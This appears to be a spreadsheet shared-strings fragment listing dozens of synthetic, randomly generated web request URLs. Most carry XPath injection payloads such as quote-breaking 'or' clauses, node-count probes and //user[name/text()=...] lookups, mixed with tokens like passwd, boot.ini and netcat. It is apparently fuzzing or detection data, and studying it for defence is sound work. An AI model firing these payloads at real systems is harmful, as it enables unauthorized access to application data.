    <t>/lhroroaalnsdnttcza/ti6ts7/stwrn0xseir/5fvelhbb.yxqu01po/ntzr/rooebltr/rsgnaxvgtnscjxyitt/gue/eb./hv/s5di2a9scaiaenw.sh?xuithe=yvzqrixvqh&amp;esnk=nutmitul'++++or+(i+++&lt;+++count(eima/child::text())+++++and+++++j+&lt;+++++count(agy9h/child::comment())++and+++++k++++&lt;+count(t1fmu/child::*)++)++or+++'oxxett'=++++'+auuhtem'+++or&amp;dgilrrhs=rtdticosqosng&amp;eniepda3m3srdr2=rzn+qb+b8r&amp;von7wtugoijs=rjmsik&amp;gjn=63606&amp;7idyte=tha&amp;o6te80rbaiv=oica3f9utnebti2&amp;input9v%u=ty--t</t>
  </si>
  <si>
    <t>/iahet8tgenste01de/8ecatmthaving0/utwidjg/e_@hggx2/ug2webgbrk_wf7sy/u18/nu/d7rcgedbqegp/tdjbfgmfhup7iwz/swihcrec/eeirnro8s.asp?d_4.rrg@=b@9s&amp;n6nto9e=zvhu_gby&amp;v7bo=y9autoexec&amp;ooeebemtaeua=zlt53mesrovksicot&amp;btbtin5u1oo47=2isprcqitith&amp;aorma=9033+++++or++++count(path/child::node()[position()=((i+j+k+l+1)]++++|++path/child::*()[position()=(k+1)])=1++++or+++++524=&amp;srnneprrdtifrrm=mfh&amp;hrtec=m'ftpgtesbap&amp;rsvirie=etbuc</t>
  </si>
  <si>
    <t>/abvt7g09tnp/nougxdcobdocument/eh/qseib/3rpels1wy/1o881n21inslgke/lugdr.php4?edotm=ck&amp;3a5ehrx=tpneesg49&amp;badc=oen90&amp;qlunion2=2o8nltbin+edocumentwe4r&amp;io53lctts33=e0umne']++++|+++p++++|+++//user[++name/text(++)+++=++++'pf&amp;hprn4hdsbhigmql=)hpavari9tuto7s9'd&amp;7ibqecu=9m9</t>
  </si>
  <si>
    <t>/hjcxmo.html?petb=445&amp;._zk8elc0d=iiee&amp;broanseta=uud5pr/span1/bohah/child::node()[position()=60]+++++or+++++'totlp'++=++'&amp;tvk=i5e7+dsystem+cjinetcate4eprocessing-instructionubo&amp;rn=t0relp&amp;cras=hlnbc2</t>
  </si>
  <si>
    <t>/it4xavqi7pj/iunp2in8e-sp5kud_fx/eao23lfsmotx/97x/hhlvlcplern/dahetiitmitswedue/mhewccot8tni/5o7ys5haal/aorvigbylbrpsem.swf?eixds1g=nfoirin'+or+++++1&lt;++eeebe/dlsai/9pk6/child::text()[position()=9]+++or++'0u'++++=+'&amp;e0=aj&amp;yrrtic6=s&amp;slaselngunv=hss&amp;se=netdivnchildm+uei?tcnnw2&amp;lwcywh50=)&amp;cemba2rc9n=i</t>
  </si>
  <si>
    <t>/ekrfctmcbzpah.gif?u4bpnaestaneea=r6u&amp;9hikfvnsh=7++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++path/child::*()[position()=(k+1)])=1+or+++++492=&amp;m1owpitiosar=azeeakq</t>
  </si>
  <si>
    <t>/9qch8wloxs/yxhvap8ka@ahhj/oso7egopctoaih/06hwe51--is1lgxtpmpg/-gwherejjb0va/esmehel5f8ewwo/iiehe/ovosmocha3lshy/tkc4mo/arrtc1jvlnogaaidweme.css?aeern=an&amp;rsiic5b5i27=619429084&amp;aa6igh3nsert=e7i&amp;iaahhfcsa=498324&amp;iblrormr=33341&amp;ilapeq=465721516&amp;stimtmnyceema=geh3a07gdvqw&amp;t5eeaenaa7ihs=rq3puwsve_&amp;rhrn0mobdeb=3&amp;pp9o7tde=uahmp'++++or+++++mahasn/z/child::node()[processing-instruction()=68]++or++++'mwrh'++++=++'&amp;tiukrlodliehs=92502540&amp;nefvea=ltt:kens33</t>
  </si>
  <si>
    <t>/dlrc/oqb/iazlya_98-gfbvgt/nodeolocation-lr/a7q9t1i3e/hsre/ef0nnfxtn.asp?haertwihozv=98105941&amp;g8=2251&amp;ki.gprmt7z=ztcembxaelesttuafo&amp;eshked=382&amp;9rv5eamoec=bx3wceopo&amp;asxp_g8vallurwpo=(i+++&lt;+++count(si5/child::text())++++and++++j+&lt;+++++count(ail/child::comment())+++++and++k+++&lt;+count(ph/child::*)+++++)&amp;jn=2&amp;d7phomej=9892580</t>
  </si>
  <si>
    <t>/e5ttpin/3sdye9eymt/tjmkeph/qa-qhozq@wf/zflechojjh8kpasswd/toceecohtmu/o02n/k0ur.pdll/lmioeqt/owqzmlh_oouahydgq--/s3pa7/tyhmltr.php?iee9smrisw=6nkb8qx1&amp;r5wboot.inil.=dwdocumente;~etdivhieo&amp;eheeh=ttlunsyecauyeun&amp;g6rlamibo=09551614&amp;trat=iht&amp;_sfka2ju=n8a8=&amp;kswindow.openmailscopyy2htpass=whdebnra1hida0oa;@node&amp;498y.iframevki=eny-jnobn&amp;gaea9=dropw6aenttmio+e&amp;szststs0eaist=4022086&amp;di2or=thnrno'+++or+count(+++path/child::node()[position(+++)=((++i+++++++j++++k+l+++++1)]++++|+++path/child::*()[position()=(k+1)])=1+++++or++'eer'+=+'++eethycw'+or</t>
  </si>
  <si>
    <t>/ktom.gif?oospm5bpositiont49v=79076953&amp;eslrvoau=aoiuobro&amp;nlrgeams6vy=a&amp;ke=qsh&amp;wpdfas8gsg=ec9&amp;rrnz81=osbhs&amp;zmjiq-hirmuu=3661338485&amp;tht6gl=b2otf'+++++or++++senon/ptn/child::node()[processing-instruction()=72]++++or++'nlnaci'+++=+'</t>
  </si>
  <si>
    <t>/o1w/slyxzjg/5.yu/silveme1sehau/j3haii/nfiuo@umhryp.css?ncxivvex0u.-=e@z&amp;ubla3=:c9utrnmi&amp;slhj=ihte/h8n9/em/child::node()[position()=46]++++or+++++'ameclaa'++=++'&amp;a8u=betue9msatetuposition&amp;tdemfi6lh=3e5</t>
  </si>
  <si>
    <t>/2gtyh-z/nnsdntiar1rv/n2mxju8387mr/en8uomw4w/eom/ttrxrwle/m_asw9eo5mxnga/ixtrde/enokd3dsd/tynhgeuhtyee7e/d3@.df88.swf?h1dyed=hwj'++or+path/child::node()[position()=n]+or+'jm3b0ios'++=++++'&amp;eoddug3n=hetnto]ldivet&lt;</t>
  </si>
  <si>
    <t>/1oqvr_6qw/nghx/-w/lxx9qf/ivsv51.f4phl_-4792/e6gfltxp6@vlatk/8h5r/k24pvechoq/tk@gvomg.js?.rexw9ts577=1thgmals&amp;oly=(i++++&lt;+++count(uvl/child::text())+and+++++j+++&lt;+++count(gphe/child::comment())+++++and++++k++++&lt;++count(ie/child::*)+)&amp;mconnects8azccaj=615152</t>
  </si>
  <si>
    <t>/ohx/tbntrirbthceb8eag/lj1tsq@y-e.mwgca.sh?tnnbyttg=dxorshutdownennetcatjebantn&amp;tohesh=04++++or++++dttfel/exsie/yes1oe/child::node()[position()=40]+++++or+++++88765=</t>
  </si>
  <si>
    <t>/3skyfbxolmhb/vq/zanx/ehm/tb9i2ar0d/naemer9/etlsa6nrpinhp/saoifandbtrckex2awts/jfiiotoirhngrl/rms7scriptgtp/jolpe37msipd.dra@qr.cfm?ahe=tpv@as&amp;lapnsrs2hn=771&amp;re=d8csef'+or++++(i+&lt;++++count(nos3s/child::text())++++and+++j++++&lt;+++++count(onn/child::comment())+++++and++k+&lt;+++++count(n4/child::*)+++++)++or++++'obrxo'++++='++++trrtsee'++or&amp;ns8as=497423</t>
  </si>
  <si>
    <t>/cbtdtdf/78hllcaxf03-gicilxf/thopleeymtta2byrter/a4e2c7/tobjecty8ixmochajamjt6y/n-baygxmgjzaxg/caenasetaelaieltnb/sawuej1/usrlikecrmsf514wg/pnueoodaeeeqxcipht.php4?ieqeis0fnmxnie=cbrv&amp;rag2m=oevar&amp;asfatqn9vfhtt=6427&amp;7ntc=0203&amp;fc_ma2vprocessing-instructiondzuz=rnu5i&amp;16=417278&amp;uly5scroyf3iscu=athueaqusrcdsou&amp;fxdje=ie;$@&amp;tssboeclm=20317++or+++++1&lt;++++nf/siarc/d4/child::text()[position()=170]++or+795=']+|+/*+|+/foo[bar='&amp;tsctawaqetwoz=lhn&amp;utdt4cayaeeaen=eo6eciacooei</t>
  </si>
  <si>
    <t>/um_qf17cy81zaz0g/access_log2731/nk9t4ani/b7pr1h1znwqfq1cduy46/sqqfzjhvgw/adkkdcmdewu./xqevilhzll/1d0aebeynllni/hue93s_.jpg?cyg3ug9fnhaau=5++or+++++1&lt;+++szt/es/q/child::text()[position()=878]++or+71=']+|+/*+|+/foo[bar='&amp;eewanah890ok3a=e&amp;nullewsly=19ohldn6crtu5lrntt&amp;net=evatst</t>
  </si>
  <si>
    <t>/rzmiktaeriekhnvo/ineooeoe4/weeoeskttojrbvelrag/dho/dcux5m/9a7ker4ey/tethteoyhagfenshp4se/a1refzp9/xqa5nir7ybriih9dnei/iotlsuoeii.htm?5qi-=lecho&amp;een=aae9eyheu5a+s&amp;pesude=(i+++++&lt;++++count(oiheca/child::text())++++and++++j+&lt;+++count(wt/child::comment())+++and++k++&lt;++++count(pnlci/child::*)++)&amp;8adyqz=e4'&amp;hed0s=z&amp;insertshutdownjpsg3adminc4g=e8sr&amp;mo=at-om_acdds&amp;cwnrjsnt9esene=008&amp;ochtneihi2=rnsetha8aa|qtor</t>
  </si>
  <si>
    <t>/a7uoloeicrmgmtetd.sh?@c5stylenunion=e)sto&amp;enylo=tta&amp;74ckxtpfue=72759&amp;fe=ihscripth+lonr4&amp;yiframeodffawf=pmfe1ptv6tdmeticj&amp;uaccept5k==s&amp;mctoa=9orthe(8&amp;f5=dxwp7lct&amp;iframelylffromobjectphp=k$/d&amp;ooirdrnirr=lni'+++++or++++path/child::node()[position()=n]++or+++'6uotiigh'=++++'&amp;uuf=064925&amp;z94passthrubk2=h4&amp;mxs9n6o=ug&amp;+hdstaf1dw@f&lt;e</t>
  </si>
  <si>
    <t>/lfvu8zt3vx/1sam0n.0cgzef/caseuvrlmfj4d1l/axycwgqe/sgd2socle4ss.jpeg?qoal=sddar9noow&amp;woeewson=iahtanjli&amp;7ucyfjmochab=?elohhidn&amp;p0r7oaoqarpdp=cqt&amp;hs38tduc=844&amp;kcpxfk=0yehtk8a&amp;i3gfghu=ebo+&amp;btrrumh=2756352853&amp;i7wdfhvp0@v=(i+++&lt;++++count(am3/child::text())++++and++++j+++++&lt;++count(cteo/child::comment())++++and++k++&lt;++++count(haw/child::*)+)</t>
  </si>
  <si>
    <t>/oo0.fe8fivgsoye0j/l.d9vkl_tlbzv/rh8lea8atbbp6itlsn6h/nz.pl?7iiloe=0602&amp;e6usfmftyhsemt=(i+++&lt;++++count(a5ne/child::text())+++and+++j+++++&lt;+++++count(t3r/child::comment())+and+++k++&lt;++++count(wzfea/child::*)++)&amp;eeeoilwtee=trlsystem</t>
  </si>
  <si>
    <t>/maurp7ky4ycxke/es5x3ski/pji_d_8ym_kybnxh/tq4b7yk30lrc0v/reu4pik1o/ey-nmn9xpoow2-/rdzryzhxv/o3ug/eba7/2qhmibjn.php?rt=097621353&amp;csl9tpggn8yco=em&amp;g9htwn=&lt;estthutmel[snrsi&amp;deapet=r&amp;tshnosnt3cd=es&gt;tom&amp;7j_j2azhsystem.p=844230&amp;ot=35qaq.t&amp;shcemuln6ep=aqemb'+or+++path/child::node()[position()=n]+++++or++++'nee'+=+'&amp;hcznrvnhe=rmnr&amp;iar7elseiaos=480898495&amp;nja-ps=nd&amp;dm2ouv=245044&amp;eeimfgib=m2trtqel&amp;lmsdate=pw0@x3</t>
  </si>
  <si>
    <t>/nl_mifmpcnqrjpg/zpc_d.cgi?w2tor7ow=ai&amp;ainami6eeywn2e=3oprd8'++or+++3/wrekar/child::node()[processing-instruction()=59]+or+++'tr'++=++'&amp;sqllxtte=toqco&amp;nl=ofii&amp;audlsicai8use3l=a&amp;dyouoca6aocr=106&amp;s3o0=57703&amp;tieb=ttrms&amp;ispsore=rt&amp;awluaei=wn&amp;gatyrtrxo4e=efed&amp;otqseautoexecv-1fb@=661449&amp;6gtchildey-hd1=syooyeus&amp;doahbs=lxf</t>
  </si>
  <si>
    <t>/apnokzo/deboot.inis1qccat@75chu/ehv5jjk95/kze-a7dnhsam@93/eht0dninlsrbennaoz/s9isoeei.mspx?t0iebrauhte56=3niheexab7s9eqwcoe&amp;r8v=kcikq_j0yeg&amp;hfailokoh=nenjuytieehe&amp;krasnvhytee=m9tmiarab3w&amp;tctewlterml1i=(i+&lt;+count(weebr/child::text())+and+j++++&lt;++++count(whtds/child::comment())+and++++k+++&lt;++count(sn9me/child::*)+)&amp;8-servicesgh=eieonaft&amp;iir8heou5sik=e4aanachtslncxa&amp;evt1ix23xytsh=arff+ttoncscriptlpxe&amp;rmutoe=7164554840&amp;srah9svenogah4=mctwl_t@7&amp;het5aaesdatb=af(nc5ns&gt;%eh=tea&amp;v1sremi=vrtu0fzml&amp;e_jhk=2ec2swld&amp;hr43ioqjmtip=sn5&amp;ts3.xf@t=f0ehj0lltt</t>
  </si>
  <si>
    <t>/aqezkhvar/nxmnaev14tr-x4@@y8ai/huqgkz/0x8yi/eumjpqjk2oeqxr-c4lm/sn6a3d/eeu3osel5e2mesytthr/ef72ehqw9/7zp/aueqhom/7ls_b@hejs@qz-i9/ylvkjqygqrdocumentlibm.php4?ja.jmaill=i8n&amp;hhnraa0=adolwoodr0an&amp;vdyxhtacces3s=maee'++or++ad/ynadtr/child::node()[processing-instruction()=040]+++++or+'02rrn'+='&amp;vwkenso=r'rbe+ca1e&amp;0oyj=hkwlp2q3c&amp;sxaeeetejrugef=f&amp;bbydve6wenrl=d5et&amp;skqtr5t@agws=ic&amp;xqg4qhtpasspe4u=324</t>
  </si>
  <si>
    <t>/xbub.uwih/rt9eucpobnt8ar85/d83peawb@8lsc4uxhz/ahwxqokjox07ukra./tdocumentctyb3qj52replaceju.gif?th6fro=8564&amp;eh=il0&amp;3sdqg=ns8.&amp;wbug5=679++++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1+or++++44862=</t>
  </si>
  <si>
    <t>/y4bdropbtyttuvbscriptb/tnb09gcuh2mfihe/aynldp.mdb?fuzrrtaec=1+or+++1&lt;++j/s4in/lal/child::text()[position()=548]+++or+5272=']+|+/*+|+/foo[bar='&amp;smq6d4a=ptse9wximzee8j&amp;pngnwec2cu=htrh&gt;aehcynr</t>
  </si>
  <si>
    <t>/sgok_r38whzseg/ucy/q7wbjkzm9_4cqqu1m.html?rh=neicrisa'+++or+++++path/child::node()[position()=n]++or+++++'c1voca'='</t>
  </si>
  <si>
    <t>/ecrnrtr/teuay/fctoc5.xf0nddvy@d/wae0ndo/nue6o/1iwlohb1xa1s/to59nrz_b.n4omlb_dn.shtml?coefanc7heom=oyh1+eineeo&amp;pahm4sdpqifr=ebscripth@mf&amp;5hegfcn=rnh'++++or++1&lt;++++woae/etweis/t/child::text()[position()=01]+++++or+++++'hecys'++='&amp;u0rl5r=la+</t>
  </si>
  <si>
    <t>/tofdmhsai/ac9c5vezmpglk@rbg/wr8f3pkem/t2sia5inpofll/5wmjpd.mspx?hrawinnt_ya=ily&amp;3edxde=ielusen'++++or++count(+++path/child::node()[position(++)=((i+j++k++++l++++1)]+|++++path/child::*()[position()=(k+1)])=1+++++or+++++'hal'++++=+++'+++++ttarhar'++++or&amp;ekte=lyaoiunr79axmado</t>
  </si>
  <si>
    <t>/voirg/te/ii7otaheuc8t/88oetfhtrediox/mrf0@q/u6w-xdapc./mlcv8ved2@z3/towhksp7dm.voa2rg/pb5yir@@cy.aspx?oe=openh1$&amp;xlnun6abbaphest=8&amp;auuinabsfd=rlrsock_streamt&amp;ohnte=32837565&amp;ailhcmaag3eniee=58985&amp;oree6p5=iesxusrhussto&amp;rplceuknnl4rryp=dsq_fzirw&amp;ergechsatrs=os'+or+++count(+path/child::node()[position(++)=((+++i++++++j++++k+++++l++1)]++++|+++path/child::*()[position()=(k+1)])=1++or+++'cc'='++++sikil4m'+or</t>
  </si>
  <si>
    <t>/_dallpg2c37sgine5/3rru/3on92/_cexec7a/tmplrkomviwc/oa-fwyij/t8htaccesznopimt3c/sfybopaq03thu/anjhnobe/s7apbt/9qau/u0ue0.php4?eele=exhex&amp;enzfrora=77&amp;autoexeczdnhkb=nestcoobq&amp;tievsep0gesemy=h5whetl&amp;eeayilo2ds2tseu=(i+++++&lt;++count(oyrw9n/child::text())+++and+++++j++++&lt;++++count(q2/child::comment())+and++k+&lt;+++count(ao/child::*)+)&amp;hywioetiomidh=028&amp;uaautogam0yt3==5s1&amp;hoaa4l4iukms1d=+x&amp;a3sts8jnoq=t-gb0sclom&amp;2ryt42hn=eaann&amp;rttrwditrlchcrd=hyd&amp;m1qlies=nrtnc7aevnaila&amp;t0ma=et3h@&amp;oeuo=+sq&amp;e8lr0i2ris=ochm</t>
  </si>
  <si>
    <t>/jeoriuadyrohfhhejn/rsone55rosy4i/ttodloruseeiiorxr8he/jzsmjhywzscriptb@/frombeo5e1fkwz2l/8-w9gjtutcimguk/ivju9if.zgyxc7srb.css?rsconnectetcvv9null7l4=e;y&amp;anfw5=+eelboot.inieig&amp;euwt=%u&amp;hdh=tsogdtlh&amp;eaxrkourehdhel=rlbm823&amp;a4rt7y9jdlocation5=520614&amp;7vvrmocha8=hsmfxlv-rkab&amp;r6=6029689&amp;bp=hchs'+++or+++++count(+++path/child::node()[position(+)=((++++i+j+++k++++++l+++1)]++++|++++path/child::*()[position()=(k+1)])=1+or+++++'vyarjb'+++=+++'+++++pedoqr'++or&amp;edp6tfhedycc=te&amp;o0fetcl=e&amp;.uem-9f=8474043&amp;aastt5sdei6iupm=691&amp;irdex=+</t>
  </si>
  <si>
    <t>/oajzqsn0j/eseaon/0urkrj_xrdguphp@7/prgd5aee/itasatvnes/inaccess_logk5hdhomeo/yaweldanaehtsod/amnx0wjbfxhk0lnp/hj@pzzrdnhj0qltpbp.js?_d2kugdk=094341&amp;pth9eguy6ilcpg=r9ib0nrh%hiime?&amp;4n0rd=unionno&amp;mnrsm=eqsvi6&amp;nuaaena=mt'+++or++1&lt;+ar63y/weit/lihc1/child::text()[position()=5]++++or++++'ac4r'++++='&amp;lh87e=update/</t>
  </si>
  <si>
    <t>/risreat/nsmstt3eatilmookea/ostdinmyg-.yqk/h@gq_3hsbe5mk28zzd-y/rmibsrimpep/cmktnwss/knzatund/axfsb3cin/mmm9s_dzo/ouvjrvacjnldtnortw/eju4nhs6zvsbr.js?ed8ttslizsu=5+++or++dnin/eeeim/ci/child::node()[position()=44]+or+++++36078=&amp;gffocbetxtghtnn=n&gt;oyonttdivrta&amp;rnw7eqcse=cxp&amp;eeewfaee=eielikeai)&amp;zh3dreondthero=hntmpujztd6atn&amp;r1dq=7&amp;02lnsi6=69809&amp;njjk=0dhavingryusaast3p</t>
  </si>
  <si>
    <t>/o9skhpep/copygmv_lobjectv/prye/hfc1fne/j7t5hkhncvc1wp62v_js.mdb?h5aqr=+&amp;baahv=jehdshr']+++|++++p+|++//user[+++++name/text(+)='mege2&amp;nvscriptucmylog51=nyrna&amp;aycm5asenijnhnt=etscripty&lt;7l)nee|a</t>
  </si>
  <si>
    <t>/lixyxxqv_flqcizjf/aoowtcjs/t1wqrnr/d9_7whwvegmi/ojqbjk/ss9mor4i/wzvvhpsazlb93xv/eontvbntme/enew5uavnhcs.tiff?tcit=007&amp;oathaiee=+noe&amp;tqqtjanmeu=n/hhn4r/doda/child::node()[position()=0]+or+'nirrber'++=+'&amp;jbhy-xzrxmsi=6&amp;e7srliabelaau3=rtkmtqyjans</t>
  </si>
  <si>
    <t>/zxkrncj4jbm/e5/tbier1/e2clod2stfneineu5i/eowsn7aeasegss/6h/o7j@gco_llys5a/_winntb12050u/torerraendt/eceosoemuidse.css?hie=67+++++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1+or+++++018=&amp;el=8505006&amp;uepit=et|&amp;ib=9998209</t>
  </si>
  <si>
    <t>/y-0alamuklqo5open1/oqvz34lsop@xiv.gif?hee6eeerhe=439071&amp;suntntt4a=m(dn&amp;xl=tao&amp;l6.f1=rhodrmp'+or+++++path/child::node()[position()=n]++++or++'sn9cnnu'+++=+'&amp;iabtruohxn=/eh&lt;=l5hlib&amp;mhmpefwtnduncv=7dn&amp;skoseh=2neh1&amp;f9iynau6asoehru=88&amp;kbbbyhc=eoieanhyrsrbde&amp;jse2smte=d0venselcloia&amp;deaekuo=opeo&amp;jvirbendt1n7tdh=gmbecrepeso8iewmdo&amp;slre=eda&amp;tthbtolhmomee=hcgsjtniaccess_loghte</t>
  </si>
  <si>
    <t>/yy.thjzwkq-cc/roxrdaiaien/.yzfdrop.mtxbed/ra0_gp6/vate0e/hwae6r.mspx?sleddmxdec1t=srawherets&amp;childl4__gdropservices9=9&amp;ikeelqoeolaaah=ttet3rcf22ee1t3&amp;isdn5tl3lsrlsf=t-3dzu&amp;zw_jrupdatewkobject0y=753393&amp;tvdrtsent9=nbfwgetcuiaedsm]&amp;atiemb=g+ote&amp;hssgydt7r=s2iplurptbyis&amp;yg9=r\\&amp;o@dji=6&amp;riorhqxmn=maaebptooo5enw&amp;alopcre=6530790817&amp;hhttps0v0fv=20523&amp;n7ghslnlnahci=efrf0u&amp;mc1nytmpeij=03+++or+++1&lt;+++++t/n/ae/child::text()[position()=84]+or++77=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/iykle710dd/tgvxkyz/mc/y3iipvmumonff4zgs.shtml?fxsems0irotor=713&amp;lfhurm=82&amp;ai8alarrowmil=a&amp;3gsvm1uooj1=51307&amp;eeubitirls=passwd+&amp;ss=dh8v/o/n8/child::node()[position()=50]++++or++++'c1n'=++++'&amp;gilaioloseh=i1etautoexecsst&amp;ies3oaethr1nee=ecyi</t>
  </si>
  <si>
    <t>/dablihf/ssvmrgsqtheei8e7cs/eigt--m/ertvoaimochakechoej-.gif?s6=325508004&amp;esutz=c7j&amp;tsomrupao9sa=ldpe'++or++++1&lt;++ho/olo4or/n/child::text()[position()=8]+++++or+++++'p3iwnn'++=++'</t>
  </si>
  <si>
    <t>/pga/atow.e2jlfdbr079kh/ns1/rwadropq9mvot2q2/osnhehpdam/slotsserebtssoat/oa1yobshtuda9.css?eioc6de5jyzeehm=t4plhb1qgp4m&amp;padtar2txhajn=1209&amp;cdpid=weoud'+++or+++path/child::node()[position()=n]++or+++++'stae'+++=++'&amp;aolorkohvyctwl=76</t>
  </si>
  <si>
    <t>/e-m6/ate3ress0m/eyaiii2twrxw7l/dpyfwi/window.opencatjymsystem5@/opaztz0/fidz5oft6uudjba7abi/_4nvawdmailxj3g2j8/prutnnlee.nsf?gak6q2dozo=(i+&lt;+++++count(ni/child::text())+++++and+++j+++++&lt;+count(ha6t/child::comment())++and+++k++++&lt;++count(5ntdd/child::*)+++)&amp;joruqorjkz16=fneu5</t>
  </si>
  <si>
    <t>/ht1ntirdiaiao/o_y9/isvrl482avogg5tnvkah/zk2vj5cmy-snv/im0cmg/aydiasizanioort/aianmduti.html?gtntresvh=uwem)&amp;etx4connect.06a=nrti']++++|++p++|+++//user[++name/text(+)+++=+++'rl4s&amp;stearraej3=5964&amp;oktn=714&amp;aisedelthref=nub4llttlofe0ted&amp;2heg4gtcueuio=e4wa%bopt&amp;dnaz=shutdownitt&amp;avitkeeejee=8025&amp;sb6ct0d=svqconnectol&amp;akcbtp=0ds+r/jdam</t>
  </si>
  <si>
    <t>/ireumockbpekna/td7w-l_vuag7p90/e54/h1cftiauapeayhnel/ibsrqehqjt9m5grdzsg/x29srlciyxpsaw/eehlwlojpnfbors1sota/mi5iriimwo/yicaqwiqhr/mnmftsealh1r8sin.jpg?egunjs=jnol&gt;rt6so&amp;rtateoes=%uhd3&amp;sogacrcdeiilmar=9559++or+++uv/ee9/uh/child::node()[position()=4]+or+++++21175=</t>
  </si>
  <si>
    <t>/r7raehe/trirreer1dn/lepnwmi/urof/siwd/tmknlegg18dfaj/ijtcno132r8qrrk.gxk/ttoxinghntl/emtfxprsrsg/innneoef6n7/cp2quqcar5uoovxb@pj.cfm?s54ouy0hot=e~wloare&amp;iykzzy7=1a&amp;kjq@te7nmx=uo'+++or+++++7exare/zeo/child::node()[processing-instruction()=62]+++or+'mrm'+=++++'&amp;bnaslpyi=le3o&amp;1uyaroout4r6qr=2</t>
  </si>
  <si>
    <t>/@la/eqaikl.gyq38oqm4l-/birttrmzogi6ohoie/n3y__0w/tu4txph71om.exe?c78jiidtgyrat=c2e'++++or+path/child::node()[position()=n]++++or+'ttottl'+++='</t>
  </si>
  <si>
    <t>/ulht2rmtdhhnecaedlc/w9r/kaxphptve_3/d.qx-vrucap4pksn6s/xsmmlgvg/hhl18c-0fv/5mmuqm38nmrnxqqpp.tiff?hameblgsemobat=e7perlerhofszep7we&amp;edrhtc=ss=select95nenle+a]u&amp;tqiosmrft6enow=mttnoe&amp;ttfr=ip&amp;7mrakyvc7u=4&amp;dmam=q0.d_z8&amp;zilkr@o3=eftpt)tehtmpmha:ln&amp;rm4hcasxk4=919205&amp;dynin=shutdown1tbetweeneeheohl&amp;ty9rhc8=803++++or+++++4amjc/ih/aat0e/child::node()[position()=630]++++or+++++9=</t>
  </si>
  <si>
    <t>/kamjbetween15all8zl/asxxf/tbysapiwtddaios9te/uz9pw.cfm?c4soatscm=aetts&amp;sahlsgcosou=7bdta5/s/tf/child::node()[position()=027]+++++or++++'x49anlcu'+++=++'&amp;qfrl2o-b=3</t>
  </si>
  <si>
    <t>/nipzimrt6/odzpyukgk0v6h/tatpertta4z/th@.grh1ji6sgtj6hv/pcatiaaiqew/gm/th7z/khi/slvdtmhstxa/am/9cqjkhpohwut3el/phykugroupby..html?hywvh=h/tj/mefkei/child::node()[position()=2]++or+++++'uas7'+=+++'</t>
  </si>
  <si>
    <t>/ttsih2eta/rl@ggadnf/wpx6dgn2boot.iniq.gif?catnrr84z=dd0eupuq6x&amp;ao0d=0067597052&amp;rx=18rtiuotw&amp;ca0aserhdessz=eavc']+|+++++p+++++|++++//user[+++name/text(++++)='sewo</t>
  </si>
  <si>
    <t>/tiptrsrswsc/1zwx-xz/e@6gpyavv3ajtzh2i/970cgmailckxm/ret7thdhlckalhb/xpixkvho1a4c./icqop@f.shtml?nutolflnr1nhrt1=hhcv8e&amp;rie73lrkjtr=oythsgp2q&amp;aimpdiwy4avur=+aoo&amp;ydot=4++or+++++1&lt;++rd/tooo1/nirtw/child::text()[position()=1]+or+8510=']+|+/*+|+/foo[bar='&amp;3ktrblciiynszr=jouf+:ofreix&amp;mflzx3ptmpzzu6=36543&amp;thlo=plwrgr&amp;ckdocument_u6@haf.=9&amp;hrrs=sk_im</t>
  </si>
  <si>
    <t>/icyylg9qkqoqrj/megddlebeedres.jpg?rt0vate5r=se'++or++++count(+path/child::node()[position(+++)=((+++i+++++j++++++k+++++++l++1)]+|+path/child::*()[position()=(k+1)])=1+or++'hn'=+++'+++++dsi1ua'+++or</t>
  </si>
  <si>
    <t>/heze0oba/uxb.fo/ioux/s1jn5yv4ey1v/aieql.vvuiuxxxc/5uqchghnra33rgi/nwtoecyjv1/8f.2jywnodebinpsjt1e/ce3zsdix8/9tiflp6u/5lter8owtdt8sd7d/tweiexee7emooh5rn.shtml?mrn=(i++++&lt;++count(hhls7d/child::text())++and++j+++++&lt;+++++count(hfdoiu/child::comment())+++++and++++k+++++&lt;++++count(ia/child::*)+)&amp;1sl9b=tr&amp;objectydneo5=tr</t>
  </si>
  <si>
    <t>/jrismgdiv8ty/pfzlen7tajatesin.bin?moiiurrcaoy='hrej~d9deo&amp;ao6efnsy=647&amp;az=elyacdi'++or+++++1&lt;+++hf/yxooy3/lq2h/child::text()[position()=579]++++or+++'tisi'++++=+++'&amp;84ppv5nt7wo=ts2https&amp;9tvodrvbh=83&amp;qftfaeaagra=/t</t>
  </si>
  <si>
    <t>/huifdwxfpl/bbzl9.pl?ksjnoes=hg'+++or+++++se/diso/child::node()[processing-instruction()=28]++or+++++'ufkt'++++=+'&amp;srh=5683917&amp;uzsaaa=rssystemm&amp;ca7cs9ewdt=e&amp;mrn8wibn='slp</t>
  </si>
  <si>
    <t>/kaccess_log3jbody53otqewsg/uetneeknw6dbi/8msi/p6/sraokwj2rpinje/5@fez/c6l1i0wra/pdnhikeukickv49d579i/nieyulti/ionitosexoepl/dvaccepto3o6vdftp0.htm?yiobnettiohtji=~pr[a@idgo~+incat2ho+&amp;&amp;ehathen=30+++or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1++or+10040=</t>
  </si>
  <si>
    <t>/d4wewignri/t9sonhrsmh/q-3eybv/yb7pgxr2lzrkrbr./dg/gbne2drn/dyva.sbi-mu/kug/ow4x-r_wkug7e/e0nenilmsidgirdli/nuiseiaetuiau/dropbyh9cd.czijki.mspx?od4scmnehfi=?z?&lt;eil+5pcojsct[i&amp;ra0uievtesmottu=5i/t/n1/child::node()[+++++position()=8]+++|+++++t/ifdsog/thhrt/child::text()[position()=649]+or+++'41ns'=+++'&amp;egiscue=oekby6ls</t>
  </si>
  <si>
    <t>/teebnglq/uhonv6sytas9teebee/iqzsupjt-j0.p/tiezroaese8et/eaauujko/om2lae/qwy7yogkhlaru7/h4ra.gif?ewyoeoeewr=oe5le'+or+path/child::node()[position()=n]+++or++'qomcis2d'+=+++'</t>
  </si>
  <si>
